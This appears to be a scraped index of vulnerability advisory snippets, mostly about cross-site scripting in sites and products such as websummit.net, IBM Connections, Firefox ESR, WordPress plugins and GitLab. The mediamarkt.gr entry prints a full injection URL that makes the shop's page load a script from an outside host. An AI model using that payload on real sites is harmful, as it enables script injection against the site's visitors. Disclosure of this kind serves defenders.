WebSummit: Reflected xss on websummit.net

Hey guys, TL;DR: Reflected XSS on websummit.net/attendees/featured-attendees as the q parameter is directly reflecting special characters in the data-url on the handlebars template section of the page, as opposed to URL encoding them. Proof of Concept: Visit...

mediamarkt.gr XSS vulnerability

Vulnerable URL: http://www.mediamarkt.gr/el/search.html?storeId=48353=-3=onlineshop=mmdede===test%27;mcs.jQuery.getScript%22//loshackers.de/a.js%22;%27a%27:%27b Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:|...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06646)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06535)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06536)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

Cross-Site Scripting

Overview Affected versions of sanitize-html do not sanitize input recursively, which may allow an attacker to execute arbitrary Javascript. Recommendation Update to version 1.4.3 or later. References - Issue 29 - GitHub Advisory...

The vulnerability of the Firefox ESR browser allows a remote attacker to execute arbitrary JavaScript code.

The vulnerability of Firefox ESR lies in the improper restriction on the resource:URL. Exploiting this vulnerability allows a malicious actor to execute arbitrary JavaScript code with privileges equivalent to those of Chrome, thereby circumventing access control policies. This can be achieved, fo...

The vulnerability of the Thunderbird email client, which allows a remote attacker to execute arbitrary JavaScript code

The vulnerability of the Thunderbird email client allows a malicious actor to bypass access policy restrictions and execute arbitrary JavaScript code with privileges of a Chrome user, by using frame relays...

The vulnerability of the Firefox ESR browser, which allows a malicious individual to execute arbitrary code

The Mozilla Firefox ESR browser contains a vulnerability related to errors in the implementation of the Web IDL technology. Exploiting this vulnerability allows malicious actors operating remotely to execute arbitrary JavaScript code with Chrome privileges, by using a fragment of IDL to trigger a...

Securimage Cross-Site Scripting Vulnerability

Securimage is an open source free PHP CAPTCHA script for generating complex CAPTCHA images and CAPTCHA code. Securimage suffers from a cross-site scripting vulnerability that could allow an attacker to execute arbitrary JavaScript code in a user's browser...

GitLab: Persistent XSS on public project page

Details A project admin can set up a custom issue tracker integration. This setting misses a check to make sure that it's a real URL and, thus, can use the javascript handler to execute arbitrary Javascript. Browsers use this handler to execute inline Javascript. This can lead to an account take...

Securimage Cross-Scripting Vulnerability

Securimage is an open source PHP CAPTCHA script for generating CAPTCHA images and CAPTCHA code . Securimage suffers from a cross-scripting vulnerability. An attacker exploits the vulnerability to inject arbitrary JavaScript code via a specially crafted URL, resulting in a cross-site scripting XSS...

WordPress Jetpack Plugin <= 3.9.1 - Cross Site Scripting

Because of this vulnerability, the attackers can inject arbitrary JavaScript or HTML code. Solution Update the plugin...

Ember.js XSS Vulnerability with User-Supplied JSON

By default, Ember will escape any values in Handlebars templates that use double curlies value. Developers can specifically opt out of this escaping behavior by passing an instance of SafeString rather than a raw string, which tells Ember that it should not escape the string because the developer...

Vulnerability in Samsung SecEmailUI

Samsung SecEmailUI is a set of apk for email reader for email client from Samsung South Korea. A security vulnerability exists in Samsung SecEmailUI. The vulnerability can be exploited by an attacker to execute arbitrary JavaScript code by tricking a user into viewing an email with HTML code tags...

Apache Cordova Whitelist Bypass Vulnerability

Cordova is to build native mobile applications with HTML, CSS, JavaScript. A security vulnerability exists in Cordova Android 3.7.2 and earlier versions. Because whitelisting restrictions are not properly applied, an attacker can bypass the whitelist and execute arbitrary Javascript using a...

Accentis Content Resource Management System Cross Site Scripting

Vulnerability type: Stored Cross Site Scripting Vendor: http://www.accentis.com.au/ Product: Accentis Content Resource Management System Credit: Foo Jong Meng, Chia Junyuan, Benjamin Tan CVE ID: CVE-2015-3425 PROOF OF CONCEPT XSS Accentis Content Resource Management System before October 2015 pat...

CVE-2002-1649

Cross-site scripting XSS vulnerability in readbody.php in SquirrelMail before 1.2.3 allows remote attackers to execute arbitrary Javascript via a javascript: URL in an IMG tag...

WordPress iThemes Security Plugin <= 4.6.12 - Stored XSS

Because of this vulnerability, the attackers can inject arbitrary JavaScript or HTML code. Solution Update the plugin...

Arbitrary JavaScript Execution

Overview A vulnerability exists in bassmaster = 1.5.1 that allows for an attacker to provide arbitrary JavaScript that is then executed server side via eval. Recommendation Update to bassmaster version 1.5.2 or greater. References - Commit b751602 - GitHub Advisory...